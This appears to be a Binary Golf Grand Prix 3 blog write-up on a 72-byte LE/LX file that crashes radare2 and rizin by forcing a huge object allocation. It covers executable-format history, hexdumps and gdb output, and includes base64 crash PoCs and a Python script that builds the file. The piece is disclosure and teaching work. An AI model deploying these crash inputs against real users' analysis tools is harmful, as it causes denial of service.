BGGP3: LEMONADE.BIN



https://n0.lol/lemonade/

In late 2020, the radare2 suite of tools was forked into a new project called rizin. Being a fork, it shares much of the same codebase with radare2, and both projects work with similar design paradigms for parsing and handling a wide variety of binary formats.

Since it’s been nearly 2 years of development for Rizin, the two have diverged enough that certain types of files are parsed better by one than the other. Other details, like what information is output, have changed too.

For this year’s BGGP, I took a look at r2 and rizin in search of possible candidates for the smallest crash. My goal then became to find something that crashed both r2 and rizin in the fewest number of bytes. Several versions of r2 and rizin have come out since the start of the challenge, so I will focus on behaviors from [radare2 5.7.0](https://github.com/radareorg/radare2/releases/tag/5.7.0) and rizin 0.3.4, and note where things changed.

SIDE NOTE: I found a 32 byte crash in the Xamarin LZ4 decompression part of radare2, but the bug had already been reported and was fixed in the version of r2 that came out shortly after BGGP3 began. It didn’t crash rizin when I tested.

POC (base64): WEFMWkYAAAAABCIA8gNNWpAAAwAAAAQAAAD//wAAuAA=

Tweet: https://twitter.com/netspooky/status/1552047700413235201

In the summer of 2021 I found a simple DoS for radare2 (CVE-2021-3673) by replacing the first byte of an ELF file with an L. I discuss this bug in tmp.0ut 2:3 https://tmpout.sh/2/3.html

When running my fuzzer I noticed this same thing came up again. This time, it seemed to crash both radare2 and rizin in the same way.

The base64 encoded PoC is as follows. You can grab a copy of rizin or radare2 and follow along.

TEVNT05BREUsIExVSCBMVUgsIExFTU9OQURFICAKTEVNT05BREUsIExVSCBMVUgsIExFTU9OQURFICAKDQBIRVkgQkdHUDMK
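
If you want to follow along, here is a minimal sketch for turning that base64 string back into a file. The output name lemonade.bin and the helper name decode_poc are my own choices for illustration; only the base64 text comes from above.

```python
import base64

# PoC string copied from this post, split into three pieces for readability
POC_B64 = (
    "TEVNT05BREUsIExVSCBMVUgsIExFTU9OQURFICAK"
    "TEVNT05BREUsIExVSCBMVUgsIExFTU9OQURFICAK"
    "DQBIRVkgQkdHUDMK"
)

def decode_poc(b64_text: str = POC_B64) -> bytes:
    """Decode the base64 PoC into raw bytes."""
    return base64.b64decode(b64_text)

if __name__ == "__main__":
    data = decode_poc()
    # lemonade.bin is just the filename used in the gdb session in this post
    with open("lemonade.bin", "wb") as f:
        f.write(data)
    print(len(data), "bytes written to lemonade.bin")
```

The decoded file should be 72 bytes long and start with the letters LE, which is all the parsers need to treat it as a Linear Executable.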

Hold up, what the heck even is LE/LX?

Before we got to enjoy the Portable Executables we know and love today, the format had somewhat of a long lineage, dating back as far as disk operating systems themselves.

In the DOS days, there were COM files, which were just pure machine code. No header, no sections, no relocations, just code.

Since everything happened in Real Mode, there wasn’t as much of a need for things like privilege levels, and memory was flat and entirely available to a given process. You could usually only execute one program at a time, so the operating system had to make sure that it set up each process consistently, and in an area that was known to contain process data. A COM file could reliably execute within this known environment, and registers would be set to default values given by the operating system. This environment was known as the Program Segment Prefix, and each OS had its own defaults.

As operating systems evolved, more control was required over the binaries that ran on the system. This was for both security and general usability purposes. The MZ-DOS EXE format came out with MS-DOS 2.0, and was designed to support things like relocations, which give the OS the ability to place code wherever it needs it to be. This is useful for things like linking, which gives way to DLLs that can extend the functionality of a program by using shared libraries that contain code reusable by any program on a given system.

NOTE: There were things such as DOS Extenders that gave the ability to enforce protections and use more advanced features while still running in real mode.

NOTE: PC DOS 1.0 (1981) had LINK.EXE, and other .exe files existed in MS-DOS 1.25 (thanks Ange!)

When Windows 1.0 came out, the “New Executable” format came with it. This was a 16 bit .exe that had even more configurability and allowed for more advanced linking and resource handling. To maintain backwards compatibility with DOS, it was placed after the MZ header with a small stub that would run in DOS mode if applicable. This is identical to how PE files are structured today.

Fun Fact! .FON and .FNT files are NE files.

File Example From https://www.chiark.greenend.org.uk/~sgtatham/fonts/

▶ yxd -f terminal.fon -s 0x170
00000000│4d5a 8b00 0100 0000│0400 1000 ffff 0000│MZ..............
00000010│0001 0000 0000 0000│4000 0000 0000 0000│........@.......
00000020│0000 0000 0000 0000│0000 0000 0000 0000│................
00000030│0000 0000 0000 0000│0000 0000 9000 0000│................
00000040│ba0e 000e 1fb4 09cd│21b8 014c cd21 5468│........!..L.!Th
00000050│6973 2069 7320 6e6f│7420 6120 7072 6f67│is is not a prog
00000060│7261 6d21 0d0a 466f│6e74 206c 6962 7261│ram!..Font libra
00000070│7279 2063 7265 6174│6564 2062 7920 6d6b│ry created by mk
00000080│7769 6e66 6f6e 742e│0d0a 2400 0000 0000│winfont...$.....
         /-- NE header at offset 0x90
00000090│4e45 050a 8c00 0200│0000 0000 0883 0000│NE.............. 
000000A0│0000 0000 0000 0000│0000 0000 0000 0000│................
000000B0│2000 4000 4000 8000│8c00 8c00 1e01 0000│ .@.@...........
000000C0│0000 0400 0000 0208│0000 0000 0000 0003│................
000000D0│0400 0780 0100 0000│0000 1400 1000 500c│..............P.
000000E0│3800 0000 0000 0880│0200 0000 0000 2400│8.............$.
000000F0│0c02 301c 0180 0000│0000 3002 4d02 301c│..0.......0.M.0.
00000100│0280 0000 0000 0000│0746 4f4e 5444 4952│.........FONTDIR
00000110│0854 6572 6d69 6e61│6c00 0000 0000 1c46│.Terminal......F
00000120│4f4e 5452 4553 2031│3030 2c39 362c 3936│ONTRES 100,96,96
00000130│203a 2054 6572 6d69│6e61 6c00 0000 0000│ : Terminal.....
00000140│0200 0100 0003 bd20│0000 5075 626c 6963│....... ..Public
00000150│2064 6f6d 6169 6e20│666f 6e74 2e20 2053│ domain font.  S
00000160│6861 7265 2061 6e64│2065 6e6a 6f79 2e00│hare and enjoy..

Introducing LE/LX

In the mid-80s, Microsoft had a partnership with IBM, who created OS/2 as a successor to their own PC DOS. As a result, the Linear Executable file format was created between them.

As both OSes evolved, the New Executable format was replaced by a more versatile 32 bit format. There’s not much information about this that I can find, but sometime around 1987 with the release of OS/2, Linear Executables became more common. LX with an MZ header was the default binary format for OS/2, and LE with an MZ header was used for user binaries on DOS and Windows 3.x. LE files were also used for VxD drivers from Windows 3.x through Windows 9.x.

The [PE format](https://docs.microsoft.com/en-us/archive/msdn-magazine/2002/february/inside-windows-win32-portable-executable-file-format-in-detail) came out around 1993 with the release of Windows NT 3.1, and eventually became the standard. PE32+ came out with the first 64 bit Windows versions some time around 2005.

This is an example of an LX file, the date command for OS/2

From: http://cd.textfiles.com/hobbesos29411/BIN/DATE.EXE

▶ yxd -f DATE.EXE -s 0x100
00000000│4d5a 0000 0200 0000│0400 0000 ffff 0800│MZ..............
00000010│0002 0000 0000 0000│4000 0000 0000 0000│........@.......
00000020│0000 0000 0000 0000│0000 0000 0000 0000│................
00000030│0000 0000 0000 0000│0000 0000 8000 0000│................
00000040│0e1f ba0e 00b4 09cd│21b8 014c cd21 5468│........!..L.!Th
00000050│6973 2070 726f 6772│616d 2063 616e 6e6f│is program canno
00000060│7420 6265 2072 756e│2069 6e20 6120 444f│t be run in a DO
00000070│5320 7365 7373 696f│6e2e 0d0d 0a24 0000│S session....$..
00000080│4c58 0000 0000 0000│0200 0100 0100 0200│LX..............
00000090│1002 0000 0400 0000│0100 0000 0000 0000│................
000000A0│0500 0000 0080 0000│0010 0000 0900 0000│................
000000B0│0901 0000 0000 0000│a100 0000 0000 0000│................
000000C0│c400 0000 0500 0000│3c01 0000 0000 0000│........<.......
000000D0│0000 0000 0000 0000│5c01 0000 6401 0000│........\...d...
000000E0│0000 0000 0000 0000│6501 0000 7901 0000│........e...y...
000000F0│5b02 0000 0300 0000│6e02 0000 0000 0000│[.......n.......

This is an example of a VxD driver in the LE format. From: http://cd.textfiles.com/silvercollection/disc4/DRIVERS/19GXE.ARJ

▶ yxd -f VDDS3.386 -s 0x100
00000000│4d5a 3d00 4f00 0000│0400 0000 ffff 0000│MZ=.O...........
00000010│b800 0000 0000 0000│4000 0000 0000 0000│........@.......
00000020│0000 0000 0000 0000│0000 0000 0000 0000│................
00000030│0000 0000 0000 0000│0000 0000 8000 0000│................
00000040│0e1f ba0e 00b4 09cd│21b8 014c cd21 5468│........!..L.!Th
00000050│6973 2070 726f 6772│616d 2063 616e 6e6f│is program canno
00000060│7420 6265 2072 756e│2069 6e20 444f 5320│t be run in DOS 
00000070│6d6f 6465 2e0d 0a24│0000 0000 0000 0000│mode...$........
00000080│4c45 0000 0000 0000│0200 0400 0000 0000│LE..............
00000090│2080 0000 0a00 0000│0300 0000 0000 0000│ ...............
000000A0│0000 0000 0000 0000│0010 0000 0b00 0000│................
000000B0│080a 0000 0000 0000│8600 0000 0000 0000│................
000000C0│c400 0000 0300 0000│0c01 0000 0000 0000│................
000000D0│0000 0000 0000 0000│3401 0000 3f01 0000│........4...?...
000000E0│0000 0000 0000 0000│4a01 0000 7601 0000│........J...v...
000000F0│500b 0000 0000 0000│510b 0000 0000 0000│P.......Q.......

This is also an LE file! http://cd.textfiles.com/doomcompanion/DOOM/DOOM.EXE

Whew, who knew binaries would be so complicated?? Here’s a little chart showing the evolution of binary formats from COM to PE32+. Click on the names for more info. (You might have to zoom in!)

%%{init: {'theme':'dark'}}%%
flowchart TB
  classDef o fill:#123
  COM["COM (1974)
Originally for CP/M and DEC
VAX 16-bit, real-mode"]:::o
  MZ-DOS["MZ-DOS (1983)
For DOS 2.0. Contains 'MZ'
header, metadata, relocations"]:::o
  AOFF["AOFF (1977)
'Absolute Object File Format'
Intel internal format."]:::o
  OMF["OMF (1981)
'Relocatable Object Module
Format' By Intel, AKA .obj"]:::o
  CMD["CMD (1981)
For CP/M and other
DOS-like OS"]:::o
  NE["NE (1985)
'New Executable'. For
Windows 1.0 and OS/2"]:::o
  LX["LX (1987)
'Linear Executable'
OS/2 2.0, 32 bit"]:::o
  LE["LE (1987)
'Linear Executable'
Mixed 16/32 bit,
Windows VxD Drivers
from 3.x-9.x, OS/2,
DOS extenders, user
Windows binaries."]:::o
  PE["PE (1993)
'Portable Executable'
32 bit, for Windows
NT 3.1 and later, and
many other platforms
like UEFI :)"]:::o
  PE32["PE32+ (2005)
64bit x86 PEs.
NOTE: 64 bit
architectures were
supported with PE,
but the format wasn't
updated until the
x86_64 version."]:::o
  AOUT["a.out (1971)
'Assembler Output'
First format for
Unix, PDP-7 and
PDP-11. Also used
in early Linux."]:::o
  COFF["COFF (1983)
'Common Object File Format'"]:::o
  ECOFF["ECOFF (1984)
'Extended COFF'
Designed for MIPS
on DEC Ultrix,
Tru64, SGI Irix,
Linux/MIPS, and
Net Yaroze"]:::o
  XCOFF["XCOFF (1986)
'eXtended COFF'
For AIX from IBM"]:::o
  ELF["ELF (1988)
Replaced COFF
in Unix SVR4"]:::o
  COM --> MZ-DOS
  COM --> CMD
  COM --> OMF
  AOFF --> OMF
  MZ-DOS --> NE
  NE --> LX
  NE --> LE
  LE --> PE
  PE --> PE32
  AOUT --> COFF
  COFF --> ECOFF
  COFF --> XCOFF
  COFF --> ELF
  COFF --> PE

Understanding LE/LX Binaries

Now that we know some of the history, let’s get into the format.

It’s pretty typical of these early binary formats: a simple header with pointers to different sections, along with their sizes and number of elements.

This layout can be thought of similarly to the PE format, with a pointer to it from inside the DOS header at offset 0x3C.
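
Here is a rough sketch of how that 0x3C pointer can be followed. The function names and the synthetic test image are mine, made up for illustration, and real parsers do a lot more validation than this.

```python
import struct

def find_new_header(data: bytes):
    """Return (offset, two-byte signature) of the header the MZ stub points to."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # 32-bit little-endian file offset stored at 0x3C in the DOS header
    (offset,) = struct.unpack_from("<I", data, 0x3C)
    if offset + 2 > len(data):
        raise ValueError("new header offset points past the end of the file")
    return offset, data[offset:offset + 2]

def make_stub_image(signature: bytes, offset: int = 0x80) -> bytes:
    """Build a synthetic MZ image (illustration only) with a header at `offset`."""
    image = bytearray(offset + len(signature))
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, offset)
    image[offset:] = signature
    return bytes(image)

if __name__ == "__main__":
    for sig in (b"NE", b"LE", b"LX", b"PE"):
        print(find_new_header(make_stub_image(sig)))
```

Run against the dumps above, the same lookup would land on 0x90 for terminal.fon (NE) and 0x80 for DATE.EXE (LX) and VDDS3.386 (LE), since those are the values sitting at 0x3C in each hexdump.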

    +-----+-----+-----+-----+-----+-----+-----+-----+ 
00h | "L"   "X" |B-ORD|W-ORD|     FORMAT LEVEL      | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
08h | CPU TYPE  |  OS TYPE  |    MODULE VERSION     | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
10h |     MODULE FLAGS      |   MODULE # OF PAGES   | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
18h |     EIP OBJECT #      |          EIP          | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
20h |     ESP OBJECT #      |          ESP          | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
28h |       PAGE SIZE       |   PAGE OFFSET SHIFT   | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
30h |  FIXUP SECTION SIZE   | FIXUP SECTION CHECKSUM| 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
38h |  LOADER SECTION SIZE  |LOADER SECTION CHECKSUM| 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
40h |    OBJECT TABLE OFF   |  # OBJECTS IN MODULE  | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
48h | OBJECT PAGE TABLE OFF | OBJECT ITER PAGES OFF | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
50h | RESOURCE TABLE OFFSET |#RESOURCE TABLE ENTRIES| 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
58h | RESIDENT NAME TBL OFF |   ENTRY TABLE OFFSET  | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
60h | MODULE DIRECTIVES OFF | # MODULE DIRECTIVES   | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
68h | FIXUP PAGE TABLE OFF  |FIXUP RECORD TABLE OFF | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
70h | IMPORT MODULE TBL OFF | # IMPORT MOD ENTRIES  | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
78h |  IMPORT PROC TBL OFF  | PER-PAGE CHECKSUM OFF | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
80h |   DATA PAGES OFFSET   |    #PRELOAD PAGES     | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
88h | NON-RES NAME TBL OFF  | NON-RES NAME TBL LEN  | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
90h | NON-RES NAME TBL CKSM |   AUTO DS OBJECT #    | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
98h |    DEBUG INFO OFF     |    DEBUG INFO LEN     | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
A0h |   #INSTANCE PRELOAD   |   #INSTANCE DEMAND    | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
A8h |       HEAPSIZE        | 
    +-----+-----+-----+-----+ 
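
To make the layout a bit more concrete, here is a small sketch that unpacks the first 0x48 bytes of the header (everything up to the object count) with Python's struct module. The field names are borrowed from the rizin struct dump later in this post, the sample bytes are copied from offset 0x80 of the DATE.EXE hexdump above, and the helper name is just something I picked.

```python
import struct
from collections import namedtuple

# Field names follow rizin's header struct as printed by gdb later in this post.
# Only the fields from 00h up to and including 44h (object count) are covered.
LE_FIELDS = (
    "magic border worder level cpu os ver mflags mpages startobj eip "
    "stackobj esp pagesize pageshift fixupsize fixupsum ldrsize ldrsum "
    "objtab objcnt"
)
LEHeaderStart = namedtuple("LEHeaderStart", LE_FIELDS)

# 2-byte magic, two 1-byte order fields, u32, two u16, then fifteen u32 in total
LE_FORMAT = "<2sBBIHHI14I"

def parse_le_header_start(data: bytes, offset: int = 0) -> LEHeaderStart:
    """Unpack the first 0x48 bytes of an LE/LX header found at `offset`."""
    return LEHeaderStart._make(struct.unpack_from(LE_FORMAT, data, offset))

# Bytes 0x80-0xC7 of DATE.EXE, copied from the hexdump above
DATE_EXE_LX = bytes.fromhex(
    "4c58 0000 0000 0000 0200 0100 0100 0200"
    "1002 0000 0400 0000 0100 0000 0000 0000"
    "0500 0000 0080 0000 0010 0000 0900 0000"
    "0901 0000 0000 0000 a100 0000 0000 0000"
    "c400 0000 0500 0000"
)

if __name__ == "__main__":
    hdr = parse_le_header_start(DATE_EXE_LX)
    for name, value in hdr._asdict().items():
        print(name, value if isinstance(value, bytes) else hex(value))
```

For DATE.EXE this gives a page size of 0x1000, an object table at 0xc4 and 5 objects, which are the kind of sane values a parser expects to see here.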

The header points to the Object Table, which lists the objects the LE needs to have set up in order to run. Each entry looks like this:

    +-----+-----+-----+-----+-----+-----+-----+-----+ 
00h |     VIRTUAL SIZE      |    RELOC BASE ADDR    | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
08h |     OBJECT FLAGS      |    PAGE TABLE INDEX   | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
10h |  # PAGE TABLE ENTRIES |       RESERVED        | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 

The Object Page Table, which each Object Table entry indexes into, describes the pages to load for each object along with their sizes and flags.

   63                     32 31       16 15         0 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
00h |    PAGE DATA OFFSET   | DATA SIZE |   FLAGS   | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 

These structures will be handy to know later on.
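
As a quick sketch, both of these small structures can be unpacked with struct as well. I'm assuming little-endian fields laid out in the order the diagrams show (24 bytes per Object Table entry, 8 bytes per Object Page Table entry). The tuple and function names are mine, and the sample values are made up purely to show the round trip.

```python
import struct
from collections import namedtuple

ObjectEntry = namedtuple(
    "ObjectEntry",
    "virtual_size reloc_base flags page_table_index page_count reserved",
)
PageEntry = namedtuple("PageEntry", "data_offset data_size flags")

OBJECT_ENTRY = struct.Struct("<6I")  # six 32-bit fields, 24 bytes
PAGE_ENTRY = struct.Struct("<IHH")   # 32-bit offset, 16-bit size, 16-bit flags

def parse_object_entry(data: bytes, offset: int = 0) -> ObjectEntry:
    """Unpack one Object Table entry starting at `offset`."""
    return ObjectEntry._make(OBJECT_ENTRY.unpack_from(data, offset))

def parse_page_entry(data: bytes, offset: int = 0) -> PageEntry:
    """Unpack one Object Page Table entry starting at `offset`."""
    return PageEntry._make(PAGE_ENTRY.unpack_from(data, offset))

if __name__ == "__main__":
    # Made-up values, packed and then parsed back
    raw_obj = OBJECT_ENTRY.pack(0x2000, 0x10000, 0x2045, 1, 2, 0)
    raw_page = PAGE_ENTRY.pack(0, 0x1000, 0)
    print(parse_object_entry(raw_obj))
    print(parse_page_entry(raw_page))
```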

How LE files are parsed

So we know that LE files follow the typical parsing mechanism required for PEs and other similar binaries. We also know that they have relative offsets and are pointed to by the MZ header. This means that a good parser will be able to seek to this offset and parse LE independently of the header that came before it.

When a binary is loaded into rizin or radare2, it is read by the program and processed as close to the spec as possible.

This is the path it takes in Rizin (per 0.3.4 source but the logic is roughly the same throughout) once the initial loading of the file and other environment checks are done.

  1. rz_bin_open_buf
  2. rz_bin_file_new_from_buffer
  3. rz_bin_object_new
  4. rz_bin_object_set_items
  5. rz_bin_maps_of_file_sections
  6. rz_bin_le_get_sections

Let’s debug and see what happens!!

Debugging the parser

Our buffer is as follows:

00000000│4c45 4d4f 4e41 4445│2c20 4c55 4820 4c55│LEMONADE, LUH LU
00000010│482c 204c 454d 4f4e│4144 4520 200a 4c45│H, LEMONADE  .LE
00000020│4d4f 4e41 4445 2c20│4c55 4820 4c55 482c│MONADE, LUH LUH,
00000030│204c 454d 4f4e 4144│4520 200a 0d00 4845│ LEMONADE  ...HE
00000040│5920 4247 4750 330a│                   │Y BGGP3.

Get set up with the debugger:

$ gdb --args /home/user/rizin/rizin-0.3.4/build/binrz/rz-bin/rz-bin -I lemonade.bin
...
gef➤  start
gef➤  break rz_bin_le_get_sections
gef➤  continue
gef➤  break 344 

At this point, we are just after the check that the section was properly allocated. Let’s examine the state of our object.

This is the header that rizin now has internally.

gef➤  p *h
$1 = {
  magic = "LE",
  border = 0x4d,
  worder = 0x4f,
  level = 0x4544414e,
  cpu = 0x202c,
  os = 0x554c,
  ver = 0x554c2048,
  mflags = 0x4c202c48,
  mpages = 0x4e4f4d45,
  startobj = 0x20454441,
  eip = 0x454c0a20,
  stackobj = 0x414e4f4d,
  esp = 0x202c4544,
  pagesize = 0x2048554c,
  pageshift = 0x2c48554c,
  fixupsize = 0x4d454c20,
  fixupsum = 0x44414e4f,
  ldrsize = 0xa202045,
  ldrsum = 0x4548000d,
  objtab = 0x47422059,
  objcnt = 0xa335047,
  objmap = 0x0,
  itermap = 0x0,
  rsrctab = 0x0,
  rsrccnt = 0x0,
  restab = 0x0,
  enttab = 0x0,
  dirtab = 0x0,
  dircnt = 0x0,
  fpagetab = 0x0,
  frectab = 0x0,
  impmod = 0x0,
  impmodcnt = 0x0,
  impproc = 0x0,
  pagesum = 0x0,
  datapage = 0x0,
  preload = 0x0,
  nrestab = 0x0,
  cbnrestab = 0x0,
  nressum = 0x0,
  autodata = 0x0,
  debuginfo = 0x0,
  debuglen = 0x0,
  instpreload = 0x0,
  instdemand = 0x0,
  heapsize = 0x0,
  stacksize = 0x0
}

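The last field our file actually fills in, h->objcnt, is 0xa335047. Those are the bytes “GP3\n” at the end of the PoC file, read as a little-endian 32 bit integer. Everything after it in the struct is zero because the file ends there.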

Rizin will now try to allocate 0xa335047 new objects to copy data from the file into memory. This is, of course, not ideal.
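
To put a number on it, here is a quick back-of-the-envelope sketch. It assumes 24 bytes per object, which is just the size of an Object Table entry in the layout shown earlier; what rizin really allocates per object is likely different, so treat the total as a lower-bound illustration rather than a measurement.

```python
OBJECT_ENTRY_SIZE = 24  # assumption: bytes per Object Table entry, from the layout above

def objcnt_from_tail(poc_tail: bytes) -> int:
    """Interpret the last four PoC bytes as a little-endian 32-bit count."""
    return int.from_bytes(poc_tail, "little")

def object_table_bytes(objcnt: int, entry_size: int = OBJECT_ENTRY_SIZE) -> int:
    """Bytes needed to hold `objcnt` entries of `entry_size` bytes each."""
    return objcnt * entry_size

if __name__ == "__main__":
    objcnt = objcnt_from_tail(b"GP3\n")
    total = object_table_bytes(objcnt)
    print(hex(objcnt))                     # 0xa335047
    print(objcnt)                          # 171135047
    print(total)                           # 4107241128
    print(round(total / 2**30, 2), "GiB")  # 3.83 GiB
```

So four bytes of text at the end of a 72 byte file ask for roughly 171 million objects.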

I originally found a bug in the same part of the code that used the Object Page Table entries to cause a large number of object allocations, rivaling that of modern applications such as Slack. That bug was further into the loop and required a larger file size, so I experimented with using a huge value in the objcnt header field to reduce the file size. This resulted in triggering the bug earlier in the loop, and the program didn’t reject the file based on its size being smaller than the allocated header object.
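
For illustration, this is the kind of sanity check that would turn the file away before any allocation happens. To be clear, this is a hypothetical sketch and not the actual rizin or radare2 fix. It assumes the object table offset is relative to the start of the LE header and that entries are 24 bytes each, and the function name is made up.

```python
def object_table_fits(file_size: int, header_offset: int, objtab: int,
                      objcnt: int, entry_size: int = 24) -> bool:
    """Return True if the whole object table lies inside the file.

    Assumes objtab is relative to the LE/LX header (hypothetical check,
    not taken from either project's source).
    """
    start = header_offset + objtab
    end = start + objcnt * entry_size
    return end <= file_size

if __name__ == "__main__":
    # Values from the PoC header: 72 byte file, header at offset 0
    print(object_table_fits(72, 0, 0x47422059, 0x0A335047))
    # A made-up well-formed case: 4 KiB file, header at 0x80, 5 objects at 0xC4
    print(object_table_fits(0x1000, 0x80, 0xC4, 5))
```

Python integers don't overflow, so the multiplication here is safe as written. A C version of the same idea would need to guard against the multiplication wrapping around.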

Sadly this won’t result in code execution, but it does have the same effect on other versions of Radare2 and Rizin, which achieves my initial goal.

The script I used to generate and test the PoC file is as follows:

import hashlib

def writeBin(b, h):
    # Write the PoC bytes to <h>.bin and print the resulting filename
    outfile = h + ".bin"
    with open(outfile, 'wb') as f:
        f.write(b)
    print(outfile)

b =  b""
b += b"LE"    # 00h -- Signature
b += b"MO"    # 02h -- B-ORD/W-ORD
b += b"NADE"  # 04h -- Format Level
b += b", "    # 08h -- CPU Type
b += b"LU"    # 0Ah -- OS Type
b += b"H LU"  # 0Ch -- Module Version
b += b"H, L"  # 10h -- Module Flags
b += b"EMON"  # 14h -- Module # of pages
b += b"ADE "  # 18h -- EIP Object
b += b" \nLE" # 1Ch -- EIP
b += b"MONA"  # 20h -- ESP Object #
b += b"DE, "  # 24h -- ESP
b += b"LUH "  # 28h -- Page Size
b += b"LUH,"  # 2Ch -- Page Offset Shift
b += b" LEM"  # 30h -- Fixup Section Size
b += b"ONAD"  # 34h -- Fixup Section Checksum
b += b"E  \n" # 38h -- Loader Section Size
b += b"\r\x00HE" # 3Ch -- Loader Section Checksum
b += b"Y BG"  # 40h -- Object Table Offset
b += b"GP3\n" # 44h -- Object Count

# Name the output file after the first 8 hex digits of the PoC's SHA-256
m = hashlib.sha256()
m.update(b)
shorthash = m.digest().hex()[0:8]
writeBin(b,shorthash)

Scoring

File Size: 72

4096 -   72 = 4024
     + 1024 = 5048 (Additional points for writeup)

Final Score: 5048
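
The same arithmetic as a tiny sketch, using only the two scoring terms shown above (4096 minus the file size, plus 1024 for a writeup). The function name is mine.

```python
def bggp3_score(file_size: int, writeup: bool = False) -> int:
    """Score as computed in this post: 4096 - size, plus 1024 for a writeup."""
    score = 4096 - file_size
    if writeup:
        score += 1024
    return score

if __name__ == "__main__":
    print(bggp3_score(72))                # 4024
    print(bggp3_score(72, writeup=True))  # 5048
```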

This is currently being patched: https://github.com/rizinorg/rizin/issues/2993

End

My BGGP3 entry was a lot different than what I originally planned. I found two other really cool things that I want to explore more in depth, so this was my backup. I am really happy to see how many people did their own projects this year. The goal was to challenge you to explore things that you might not normally look into, and give people a reason to go deep with things that most people would just consider an annoyance.

Shoutout: gren, xcellerator, hermit, dnz, Ange Albertini and qkumba for the ancient wisdom, tmp.0ut, and everyone who did BGGP